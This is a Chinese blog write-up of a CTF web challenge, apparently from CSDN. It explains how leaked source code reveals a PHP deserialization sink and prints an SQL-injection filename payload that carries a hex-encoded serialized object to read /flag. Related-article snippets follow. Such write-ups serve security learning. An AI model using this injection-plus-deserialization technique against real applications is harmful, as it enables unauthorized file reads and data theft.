[安洵杯 2019]不是文件上传 sql注入 发序列化 信息泄漏

最新推荐文章于 2023-02-22 14:17:51 发布
最新推荐文章于 2023-02-22 14:17:51 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104120248
版权

题目描述

找了半天也没找到题目的关键点·~~
看了writeup才知道有个信息泄露
在这里插入图片描述然后在github上下载源码就可以了~~

解题过程

首先我们拿到一套源码,先找到哪段代码能够读取flag~~
在这里插入图片描述在helper.php中有一段代码,可以读取文件~~,很明显的反序列化~~
然后我们在文中找一下序列化和反序列化的点~~
在这里插入图片描述在这里插入图片描述大概说明一下代码的意思,我们上传图片时,会序列化图片的宽高,然后在show.php中读取图片的信息~~
大概的流程讲一下

上传图片(序列化)-》数据库-》读取图片信息(反序列化)

这三个过程中,第一个和第二个过程一些信息我们可以控制,首先是上传图片的宽高我们无法控制其内容,所以我们只有通过SQL注入来改变存入数据库中序列化的内容~~

<?php
class helper {
        protected $ifview = True; 
        protected $config = "/flag";
}

$a = new helper();
echo bin2hex(serialize($a));

我们只需要保存在数据库中的内容为输出为上面的代码输出的内容就行了~~

现在我们来看一下上传图片的过程中,哪里存在sql注入~~
在这里插入图片描述
这儿是上传的函数~~,上传的内容主要包括五个(title,filename,ext,path,attr)
序列化的内容为第五个参数attr,我们再跟进一下,看这五个参数是如何调用的~~
跟进getfile()函数~~
在这里插入图片描述
接着又调用了check()函数,跟进cheak看看~~
在这里插入图片描述这个传进去的参数info就是我们上传的图片$_FILES[$input]

return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);

我们通过check可以知道只有filename我们可控,而且title的值于filename有关,就是去掉后缀名的值,例如filename=a.jpg,那么title=a

那么sql注入便可以轻松得到~~

filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"

那么title的值为:

"a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#"

由于先插入的是title,刚好title最后为#,注释了后面的语句,注入成功~~
最后再访问一下show.php就可以看见flag了~~

HyyMbb
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[安洵 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 253
进入题目传了一个jpg图片上去 现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
[安洵 2019]不是文件上传
feng的博客
04-13 316
知识点 SQL注入 WP 进入环境,有一个upload.php可以传文件,有一个show.php可以查看上传的列表,现有点像是存入了数据库,再考虑到以前似乎听说过文件上传中文件名的SQL注入,就猜测这题应该其实是一个SQL注入。在filename那里尝试了一下,一开始是1.png可以,1.png'提示我必须上传图片,再考虑到show.php那里的回显,文件名是被加密的,因此猜测后端可能是把.png前面的东西单独的处理,存入了数据库,于是这样:1'.php,果然报wrong了,再试试1'or'1.php
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 489
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链1
08-03
首先泄露目标的WEB目录,然后通过反序列化PDO连接,读取数据库配置文件,再利用这些配置触第二次反序列化并执行SQL注入。 为了防止此类攻击,开者应升级ThinkPHP至不受影响的版本,同时对序列化和反序列化...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
sql injection(SQL注入)教程
10-25
SQL注入是一种常见的网络安全威胁,它利用了应用程序对用户输入数据处理不当的问题,使得攻击者能够操纵SQL查询,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。本教程将详细讲解SQL注入的各个...
一种新型的SQL注入攻击检测机制研究.pdf
09-19
SQL注入攻击是网络安全中的一大威胁,它利用了Web应用程序对用户输入数据的处理不当,使得攻击者能够构造恶意的SQL代码,从而控制或篡改数据库中的数据。在本文中,我们将深入探讨一种新型的SQL注入攻击检测机制,该...
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
者应该确保在反序列化过程中对数据进行严格的验证,避免执行未预期的代码或泄露敏感信息。同时,安全研究人员和渗透测试人员则需要掌握这类漏洞的检测和利用技术,以提升网络安全防御能力。
[安洵 2019]不是文件上传(文件名不能用“,数据库可识别hex编码)
qq_62046696的博客
01-04 421
然后看到了file_get_contents可以读flag,所以$path=/flag,为什么是这个呢,是因为基本上的题目flag都在根目录如果不对可以再继续尝试,然后前提是ifview为true.数组变成了:O:6:"helper":2:{s:9:"\0\0\0ifview";打开题目尝试上传文件现只能上传图片,然后看见了图片的路径,但是图片码连不上蚁键,结合题目,然后看到了题目给出的github源码。本来我是没相通为什么,后面序列化的需要hex编码,后来突然懂了,是因为双引号被禁用。
BUUCTF:[安洵 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 375
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这周写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
[安洵 2019]不是文件上传1
最新发布
m0_62129839的博客
02-22 148
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
BUUCTF:[安洵 2019]不是文件上传
末初的CSDN博客
03-28 2023
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
[安洵 2019]easy_serialize_php
Yang_99的博客
08-08 516
1.考点 锻炼代码审计能力和学习 PHP反序列化序列化中的对象逃逸 分析题目源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);
2020安洵——EasyCM WriteUP
qq_43547885的博客
01-23 525
文章目录概述详细反调花指令SMC写脚本解密 最近犯懒,没看新题,想起来之前安洵做过一道 SMC + 反调试的题,当时是动调 + 瞎蒙做出来的,今天来整理一下里面的知识点 题目链接:https://github.com/D0g3-Lab/i-SOON_CTF_2020/tree/main/re/EasyCM 需要用到的 IDA 插件(能够简化大量操作):IDACode & IDAPython 概述 入口点: 这题用到了 TLSCallback 在 main 函数前执行各种解密操作, 在 IDA
信息安全技术之SQL注入式攻击
12-17
SQL注入是一种常见的攻击方式,可以通过在Web表单、URL查询字符串等输入中插入恶意的SQL命令,最终欺骗服务器执行这些命令。攻击者利用这种漏洞可以获取未授权的数据库操作权限,篡改网页内容,甚至获取管理员密码并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值